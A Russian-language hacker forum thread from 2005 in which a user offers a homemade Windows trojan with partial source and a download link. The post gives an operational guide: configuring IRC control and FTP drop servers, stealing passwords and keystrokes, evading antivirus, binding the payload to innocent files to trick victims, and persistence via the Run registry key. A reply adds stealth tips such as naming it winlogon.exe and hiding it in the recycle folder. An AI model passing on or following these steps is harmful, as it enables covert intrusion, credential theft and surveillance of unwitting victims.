Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..) - 2005-01-23 22:26:48
|
|
|
turtle
Сообщений: 1
Оценки: 0
Присоединился: 2005-01-23 22:23:20
|
Абсолютно новый троян, которым я написал и уже вдовль наигрался поэтому решил выложить его широкой общественности.
http://ttarc.narod.ru/ttrojan.zip
выкладываю с ИСХОДНЫМ КОДОМ.. правда чуточку подпоченным. (для того чтобы безграмотные вандалы не возомнили чего хорошего о себе) кому нужно - разбереться
еще НЕ ОТЛАВЛИВАЕТСЯ АНТИВИРЯМИ!!
хорошо зарекомендавал себя.. файерволы не обходит.. если нужно сам доделаешь..
врядли я еще тут появлюсь, времени нет так что со всеми вопросами в мыло bsturtle@list.ru
PS: вступлю в хактиму :) ================================================================== [Russian]
Turtle Trojan 1.0
=================================================================== 1) Общие сведения: Название: Turtle Trojan Версия: 1.0 Автор: Turtle Компилятор: Delphi 6 Размер серверной части: 63 Кб. (Не пакованный), 27 Kб. (сжатый exe-компрессором UPX, Copyright © 1996-2002 Markus Oberhumer Laszlo Molnar http://upx.sourceforge.net); Сервер написан без визуальных компонент и классов, выполнен целиком на Windows API Расположение: %SYSTEM% Автозагрузка: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Exe-файл сервера: DivXdrv.exe =================================================================== [skip] ================================================================= 3) Назначение: Мониторинг удаленного компьютера. ================================================================= 4) Возможности:
* Клавиатурный шпион. * BackDOOR. Позволяет подключиться по TCP-протоколу к удаленному ПК и просматривать носители, также скачивать, удалять, выполнять файлы и программы. В общем все выглядит как в Windows Commander :) . * Высылает на ваш FTP сервер найденные и перехваченные пароли, также логи созданные клавиатурным шпионом (Hooker, Хукер) * При выходе в онлайн серверная часть выводит бота в IRC, откуда по команде сообщает хозяину (вам) свой IP адрес, и другую небольшую но важную информацию. (ИП адрес, имя компа, имя юзера, Версию ОС итд) * Функции доступные из Клиентской части при прямом подключении - получить список дисков - получить списки директорий и файлов на дисках (как в Коммандере) - скачать/удалить/запустить файлы - Отправить сообщение (MessageBox) - Открыть/закрыть CD-ROM - Можно похрюкать флопом :) (если перейти на Диск А: например) - Перезагрузить Комп - Командная строка - Выгрузить сервер - Скрыть/показать рабочий стол, Панель задач - Открыть браузер с определенной страницей - Возможность узнать пути к папкам Мои документы, Сисемной и Windows директории для быстрой навигации на вражеском компе. и немногое другое * Возможность докачки дополнений (Plugin) которые можно доработать самому =================================================================== 5) Настройка. Как все это работает? :
Вам необходимо сконфигурировать серверную часть(которую будем впаривать) под себя. для этого мы воспользуемся конфигуратором (conf.exe) Не запускайте конфигуратор прямо из архива. обязательно разархивируй conf.exe вместе с server.dat в одну директорию. Запускаем conf.exe. тут необходимо заполнить поля: 1) IRC сервер. - это сервер на который будет выходить бот (напр. "irc.ircnet.ru") 2) IRC port - порт Ирс сервера (напр. "6667") 3) IRC Chan - Канал на котором бот будет висеть (напр. "#mybots") 4) BotNick - Ник бота который будет там сидеть. (напр. "MyBot") (на самом будет сидеть ник вида ник+случайное число и выйдет например ник MyBot21354); 5) BossNick - Ваш реальный ник в ИРС.. бот будет обращаться только к вам в приват!! (напр: "MyCoolNick") 6) BotPassword - пароль для доступа к боту. Бот выдает информацию только своему хозяину и только при указании правильного пароля. Что дает защиту при использовании ваших ботов другими кулхакерами. 7) FTPserv - фтп сервер куда будут отправляться пароли и логи. (напр. "ftp.narod.ru"). (Народ работает! проверено.) 8) FTPUser - ваша учетная запись, логин на фтп серваке (напр. "newuser") 9) FtpPass - пароль на доступ к фтп
После окончания работы конфигуратор создаст файл out.exe - готовый к работе троян! дальше вы переименовываете его как хотите..приклеиваете к чему хотите..(Joiner''ом или СуперКлеем http://bonza.narod.ru). и впариваете..
!внимание! такие вещи как "Супер Клей" с bonza.narod.ru занесены в антивирусные базы! т.е после склейки касперский орет. я предпочитаю склеваить WinRar-ом… он позволяет без лишних вопросов распаковать в анвизибл режиме sfx архив например во временную папку и запустить троян оттуда без лишних вопросов. - разбирайтесь сами или ищите нужные доки на эту тему.
После того как жертва запустил(а) файл с трояном, он копируется с системную директорию %SYSTEM% и прописывается в автозагрузке. После перезапука windows троян начинает работу.
Кейлоггер записывает все нажатые клавиши в файл %System%\hplt.thl. причем сочетания <Del> Это значит что юзер нажимал Delete а <BS> - бекспейс. причем в файле лога фиксируется имя программы в которой воодились эти данные. если на экране компа появляется окошко в котором встречается слово "Пароль", "Passw" "Установка связи" итп.. то Келоггер сдирает всю информацию с этого окошка включая пароли под ********.. и записывает в файл hplt32.thl
Каждые 2-3 минуты троян проверяет соединение с Интернетом. если интернет доступен, то: - если лог с паролями превысил 100 байт, то он закачивается на ФТП - если клавиатурный лог превысил 10 КБайт, то он закачивается на ФТП (если логи превысили размер 300 кб, то они удаляются с диска создаются заново.) - ИРС бот выходит на ИРС канал, индексируя тем самым что жертва в данный момент находится в сети. вы зайдете на канал к боту и вам будут доступный команды: !BOSSNICK, - выдаст имя владельца бота. !HELP, - справка по командам !IP <Botpassword>, - выдаст ИП адрес зараженного компа (напр. "!IP myPass") !INFO <Botpassword>, - информацию о боте и версию ОС жертвы !LAMERNAME <Botpassword> - имя юзера и имя компа жертвы <BotPassWord> вы задавали при конфигурировании сервера.. без пароля бот вам не ответит. - узнав IP жертвы у ИРС-бота вы можете запустить клиент и присоединиться к жертве. дальшеxxxxxxть, удалять(ЧТО СТРОГО НЕ РЕКОМЕНДУЕТСЯ) файлы. запускать у жертвы всякие программы, прикалываться итп - также каждые три минуты троян проверяет наличие обновления на фтп сервере (файл: hpltplg.dll) который вы можете самостоятельно изготовить на любом win32 языке программирования. шаблон изговоления плугина на дельфи вы можете посмотреть в архиве hpltplg.zip. изготовили hpltplg.dll, закачали на ФТП сервер, троян через 3 минуты его скачает, и после перезапуска винды жерты новые функции заработают. есть возможность разработать дополнительные 3 процедуры, которые будут срабатывать через каждые X секунд (Х задается при разработке плугина)
=============================================================================== Чтобы уменьшить размер сервера до 27 кб необходимо скачать UPX http://upx.sourceforge.net пакуется командой: UPX.exe -9 servername.exe =============================================================================== ——-
Создатель: Turtle. bsturtle@list.ru
|
|
|
Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..) - 2005-01-24 12:10:47
|
|
|
Maker
Сообщений: 647
Оценки: 0
Присоединился: 2004-03-11 18:50:32
|
Вот спасибо доброму человеку. На досуге можно покапаться…
|
|
|
Выкладываю свой свежий троян + сорцы (бэкдур, кейлог, ирс-агент и др..) - 2005-01-24 12:35:46
|
|
|
Harrior
Сообщений: 11
Оценки: 0
Присоединился: 2004-12-20 01:15:22
|
могу назвать перу минусов данного троя 1. Светится в TaskMng и его тамже можно завершить. 2. легко палится т.к. серится тамже где и другие трои. 3. стандартный запуск. Вероятные решения.
1-2. сменить имя трою на winlogon.exe и поселить в \RECYCLER\ 3. ставь на загрузку из %windir\Tasks . как? смотри www.microsoft.com MSDN. и поменяй у файлика в тасках атрибут +h
|
|
|
|
|